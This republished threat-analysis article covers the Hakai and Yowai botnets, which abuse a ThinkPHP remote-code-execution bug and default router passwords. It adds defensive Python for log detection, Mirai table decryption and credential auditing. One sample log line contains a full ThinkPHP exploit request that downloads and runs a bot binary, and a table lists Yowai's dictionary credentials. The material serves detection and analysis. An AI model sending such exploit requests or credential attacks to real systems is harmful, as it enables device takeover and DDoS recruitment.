Example analysis of the Hakai and Yowai botnets abusing a ThinkPHP vulnerability

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article walks through two botnets, Hakai and Yowai, that abuse a ThinkPHP vulnerability: how they spread, what they carry, and what defenders can do about them.

Preface

Cyber criminals are using a ThinkPHP vulnerability that was disclosed and patched in December 2018 to spread two botnet malware families: Yowai, a Mirai variant, and Hakai, a Gafgyt variant.

They exploit the vulnerability to compromise web servers that host sites built on the PHP framework, and they use dictionary attacks against routers protected only by default credentials. The devices taken over in either way are enlisted in the botnets and used for distributed denial-of-service (DDoS) attacks.
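The first thing a web server operator wants after reading the preface is a way to tell whether the ThinkPHP bug is being thrown at their servers. The following is an added example for this article (not code from the article or from Trend Micro): it scans access-log lines for the publicly documented request shape of the December 2018 ThinkPHP 5.x exploit, a routed call to think\app::invokefunction with function=call_user_func_array and the real target function in vars[0]. That request shape is public knowledge about the vulnerability, not something this page states, and the log lines are constructed sample data.

```python
"""Flag web requests that match the ThinkPHP 5.x remote code execution bug
(disclosed and patched in December 2018) which Yowai and Hakai use to
compromise web servers.

Added example for this article; not code from the article or from Trend
Micro. The request shape it looks for (route think\\app/invokefunction,
function=call_user_func_array, target in vars[0]) is the publicly documented
exploit pattern for that bug. The access-log lines below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Common/combined log format: we only need client IP, timestamp, URL, status.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3})'
)
# Route used by the public exploit; the backslashes may be raw, %5C or doubled.
INVOKE_ROUTE = re.compile(r'think\\+app/invokefunction', re.IGNORECASE)
# Functions the public payloads handed to call_user_func_array to run commands
# or drop files on the server.
DANGEROUS_FUNCS = {"shell_exec", "system", "exec", "passthru", "popen",
                   "proc_open", "assert", "eval", "file_put_contents"}

# Constructed sample log (hypothetical addresses, not a real capture).
SAMPLE_LOG = [
    '198.51.100.4 - - [22/Jan/2019:10:13:55 +0000] "GET /index.php?s=index/index/index HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jan/2019:10:14:03 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+http://203.0.113.9/bins/x86;chmod+777+x86;./x86 HTTP/1.1" 200 74 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Jan/2019:10:15:10 +0000] "POST /index.php?s=user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    r'203.0.113.77 - - [22/Jan/2019:10:20:41 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 64920 "-" "python-requests/2.21.0"',
]


def _decode(s):
    # Decoded twice: scanners sometimes double-encode the backslash in the route.
    return unquote_plus(unquote_plus(s))


def parse_query(url):
    """Split the query on '&' before decoding, so a ';' or '+' inside the
    command payload does not break the parse (older parse_qs splits on ';')."""
    params = {}
    for part in url.partition("?")[2].split("&"):
        if part:
            key, _, value = part.partition("=")
            params.setdefault(_decode(key), []).append(_decode(value))
    return params


def classify_request(url):
    """Return a dict describing an exploit attempt, or None for a normal request."""
    path = _decode(url.partition("?")[0])
    params = parse_query(url)
    route = params.get("s", [""])[0]
    if not (INVOKE_ROUTE.search(route) or INVOKE_ROUTE.search(path)):
        return None
    func = params.get("function", [""])[0]
    target = params.get("vars[0]", [""])[0]      # real function behind call_user_func_array
    command = params.get("vars[1][]", [""])[0]   # its first argument, e.g. the shell command
    severity = "rce" if func == "call_user_func_array" and target in DANGEROUS_FUNCS else "probe"
    return {"severity": severity, "function": func, "target": target, "command": command}


def scan_access_log(lines):
    """Run classify_request over raw log lines; return findings with IP and time."""
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("url"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["ts"], f["target"], f["command"])
```

A 200 status on an "rce" finding is the case to treat as a probable compromise: the payload in the sample (fetch a binary, make it executable, run it) is exactly the download-and-execute step a botnet dropper performs, so the next move is to look for the dropped file and an outbound connection from the web server.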

Yowai

Yowai (detected by Trend Micro as BACKDOOR.LINUX.YOWAI.A) has a configuration table like other Mirai variants and decrypts it with the same routine; the ThinkPHP exploit has been added to its list of infection vectors.
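The "same decryption routine" refers to the configuration-table obfuscation in the leaked Mirai source, which XORs every table byte with each of the four bytes of a 32-bit key in turn (0xDEADBEEF in the leaked source; variants usually change only the key). The block below is an added example for this article, not code from the article, from Trend Micro, or from any malware sample: it ports that routine, shows why it collapses to a single-byte XOR, and recovers the key from a known string, which is how an analyst decodes the table of a variant with a changed key. The sample table entries are constructed here (well-known Mirai strings encrypted with the default key), not extracted from Yowai.

```python
"""Decrypt a Mirai-style configuration table.

Added example for this article; not code from the article, Trend Micro, or
the malware. Mirai's published table.c XORs each byte of every table entry
with the four bytes of table_key in turn; the sample entries below are
constructed by encrypting known Mirai strings with the default key.
"""

MIRAI_TABLE_KEY = 0xDEADBEEF  # key in the leaked Mirai source; variants change it


def key_bytes(key):
    """The four key bytes in the order Mirai's toggle_obf() applies them."""
    return [(key >> shift) & 0xFF for shift in (0, 8, 16, 24)]


def effective_key(key):
    """XOR is associative and commutative, so applying the four key bytes in
    turn equals one XOR with their combined value (0x22 for 0xDEADBEEF)."""
    k = 0
    for b in key_bytes(key):
        k ^= b
    return k


def toggle_obf(data, key=MIRAI_TABLE_KEY):
    """Port of Mirai's toggle_obf(): XOR every byte with each key byte in turn.
    The same call both encrypts and decrypts."""
    out = bytearray(data)
    for i in range(len(out)):
        for kb in key_bytes(key):
            out[i] ^= kb
    return bytes(out)


def decrypt_table(entries, key=MIRAI_TABLE_KEY):
    """Decrypt a list of encrypted entries (each stored with its trailing NUL,
    as Mirai's val_len includes it) back to strings."""
    return [toggle_obf(e, key).rstrip(b"\x00").decode("latin-1") for e in entries]


def recover_key(blob, known_plaintext):
    """For a variant with an unknown key: because the scheme is a single-byte
    XOR, try all 256 values and return those under which a known string
    (a path, a C&C message, the kill-list name of a rival) appears."""
    return [k for k in range(256) if known_plaintext in bytes(b ^ k for b in blob)]


# Constructed sample: known Mirai strings encrypted here with the default key.
SAMPLE_TABLE = [toggle_obf(s) for s in (b"/proc/\x00", b"/bin/busybox\x00",
                                        b"TSource Engine Query\x00")]
SAMPLE_BLOB = b"".join(SAMPLE_TABLE)

if __name__ == "__main__":
    print("effective key: 0x%02x" % effective_key(MIRAI_TABLE_KEY))
    print(decrypt_table(SAMPLE_TABLE))
    print("candidate keys:", recover_key(SAMPLE_BLOB, b"busybox"))
```

In practice the encrypted table is located in the binary's data section by looking for the XOR-ed form of a string every Mirai descendant carries (such as /proc/ or /bin/busybox); once the single-byte key is known, the C&C address, the console message and the kill list all fall out of the same decryption.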

Yowai listens on port 6 for commands from its command-and-control (C&C) server. After infecting a router, it runs dictionary attacks to try to infect other devices. Each infected router becomes part of the botnet, and the operators can use the enlisted devices to launch DDoS attacks.

Yowai complements its dictionary attacks with several other exploits, and it prints a message on the device's console after execution. Analysis also found that it carries a list of competing botnets whose processes it kills on the infected system.

Table 1. Default usernames and passwords that Yowai uses for dictionary attacks, and the competing botnets it removes from the system

Dictionary attack usernames/passwords: OxhlwSG8, Default, tlJwpbo6, S2fGqNFs, admin, daemon, 12345, guest, support, 4321, root, vizxv, T0talc0ntr0l4!, bin, adm, synnet

Competing botnets killed: dvrhelper, mirai, light, apex, Tsunami, hoho, nikki, miori, hybrid, sora, yakuza, kalon, owari, gemini, lessie, senpai, apollo, storm, Voltage, horizon, meraki, Cayosin, Mafia, Helios, Sentinel, Furasshu, love, oblivion, lzrd, yagi, dark, blade, messiah, qbot, modz, ethereal, unix, execution, galaxy, kwari, okane, osiris, naku, demon, sythe, xova, tsunami, trinity, BUSHIDO, IZ1H9, daddyl33t, KOWAI-SAD, ggtr, QBotBladeSPOOKY, SO190Ij1X, hellsgate, sysupdater, Katrina32
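Table 1 is directly usable on the defensive side: the credential column tells you which passwords make a device a Yowai target, and a burst of telnet login failures cycling through those usernames from one source is the dictionary attack itself. The following added example (not code from the article or from Trend Micro) does both checks: it groups failed logins by source address over constructed util-linux-style login records, scores how many of the usernames tried come from Yowai's list, notes whether a successful login followed, and audits a device inventory for passwords that appear in the list. The log format and the inventory are assumptions made for the example.

```python
"""Detect Mirai-style telnet dictionary attacks and audit device passwords
against the credential list Yowai uses (Table 1 of the article).

Added example for this article; not code from the article or Trend Micro.
The login records mimic util-linux login(1) messages and are constructed;
the device inventory is hypothetical.
"""
import re
from collections import defaultdict

# Strings Yowai tries as telnet usernames/passwords (Table 1).
YOWAI_DICTIONARY = {
    "OxhlwSG8", "Default", "tlJwpbo6", "S2fGqNFs", "admin", "daemon", "12345",
    "guest", "support", "4321", "root", "vizxv", "T0talc0ntr0l4!", "bin", "adm", "synnet",
}
_YOWAI_LOWER = {s.lower() for s in YOWAI_DICTIONARY}

# Constructed records; the attacker at 203.0.113.5 walks the list, then gets in.
SAMPLE_AUTH_LOG = [
    "Jan 22 10:15:01 gw login[512]: FAILED LOGIN (1) on '/dev/pts/0' from '203.0.113.5' FOR 'root', Authentication failure",
    "Jan 22 10:15:02 gw login[512]: FAILED LOGIN (2) on '/dev/pts/0' from '203.0.113.5' FOR 'admin', Authentication failure",
    "Jan 22 10:15:04 gw login[512]: FAILED LOGIN (3) on '/dev/pts/0' from '203.0.113.5' FOR 'support', Authentication failure",
    "Jan 22 10:15:05 gw login[512]: FAILED LOGIN (4) on '/dev/pts/0' from '203.0.113.5' FOR 'guest', Authentication failure",
    "Jan 22 10:15:07 gw login[512]: FAILED LOGIN (5) on '/dev/pts/0' from '203.0.113.5' FOR 'daemon', Authentication failure",
    "Jan 22 10:15:09 gw login[512]: LOGIN ON /dev/pts/0 BY root FROM 203.0.113.5",
    "Jan 22 10:16:30 gw login[530]: FAILED LOGIN (1) on '/dev/pts/1' from '198.51.100.20' FOR 'alice', Authentication failure",
    "Jan 22 10:16:35 gw login[530]: LOGIN ON /dev/pts/1 BY alice FROM 198.51.100.20",
]

FAILED = re.compile(r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) login\[\d+\]: FAILED LOGIN .* "
                    r"from '(?P<src>[^']+)' FOR '(?P<user>[^']*)'")
SUCCESS = re.compile(r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) login\[\d+\]: LOGIN ON \S+ "
                     r"BY (?P<user>\S+) FROM (?P<src>\S+)")


def parse_login_events(lines):
    """Turn login records into dicts with ts, host, src, user and ok (success flag)."""
    events = []
    for line in lines:
        m = FAILED.match(line)
        if m:
            events.append({**m.groupdict(), "ok": False})
            continue
        m = SUCCESS.match(line)
        if m:
            events.append({**m.groupdict(), "ok": True})
    return events


def detect_dictionary_attacks(lines, threshold=3):
    """Flag sources with at least `threshold` failed logins; report how many of
    the usernames tried are on Yowai's list and whether a login then succeeded."""
    by_src = defaultdict(list)
    for ev in parse_login_events(lines):
        by_src[ev["src"]].append(ev)
    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if not e["ok"]]
        if len(failures) < threshold:
            continue
        hits = [e["user"] for e in failures if e["user"].lower() in _YOWAI_LOWER]
        findings.append({
            "src": src,
            "failures": len(failures),
            "yowai_hits": len(hits),
            "users_tried": sorted({e["user"] for e in failures}),
            "login_after_attack": any(e["ok"] for e in evs),
        })
    return findings


def audit_credentials(inventory):
    """inventory: iterable of (device, username, password). Return the devices
    whose password is on Yowai's list (case-insensitive), i.e. ones a single
    dictionary pass would take over."""
    return [dev for dev, _user, pw in inventory if pw.lower() in _YOWAI_LOWER]


# Hypothetical inventory for the audit.
SAMPLE_INVENTORY = [("gw", "admin", "kQ7!pVz2-unique"), ("cam-01", "root", "vizxv"),
                    ("dvr-02", "admin", "12345")]

if __name__ == "__main__":
    for f in detect_dictionary_attacks(SAMPLE_AUTH_LOG):
        print(f)
    print("weak passwords on:", audit_credentials(SAMPLE_INVENTORY))
```

A finding with login_after_attack set to True is the one to escalate: on a Mirai-family infection the successful telnet login is followed within seconds by the download of the bot binary, so the device should be isolated and its process list compared against the kill list in Table 1.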

In addition to the ThinkPHP vulnerability, Yowai also exploits CVE-2014-8361 (a command execution bug in the Realtek SDK miniigd UPnP service), a Linksys RCE, CVE-2018-10561 (an authentication bypass in Dasan GPON routers) and a CCTV-DVR RCE.

Hakai

Hakai (detected by Trend Micro as BACKDOOR.LINUX.HAKAI.AA) is a Gafgyt variant that infects IoT devices and relies on router vulnerabilities to spread.

Interestingly, the Hakai sample contains code copied from Mirai, in particular the functions used to encrypt its configuration table. That code cannot actually run in the sample, and the telnet dictionary-attack code appears to have been deliberately removed to make Hakai stealthier.

Because Mirai variants routinely kill competing botnets, staying away from IoT devices that still use default passwords gives Hakai a survival advantage: it is less likely to land on a device a Mirai variant already holds. Spreading through exploits alone is also harder to detect than brute-forcing telnet.

Conclusion

ThinkPHP is a free, open-source PHP framework that developers and companies like for its simplicity and ease of use, which also makes it an attractive target for malware such as Hakai and Yowai that compromise web servers and attack websites. As more botnet source code circulates and is traded online, competing botnets can be expected to share similar code.

Cyber criminals will keep studying botnets like Mirai, creating more Mirai variants and adapting the malware to reach more IoT devices that use default passwords. IoT users should update device firmware to the latest version released by the manufacturer to fix known vulnerabilities, and should replace default device passwords and rotate them regularly to prevent unauthorized logins.
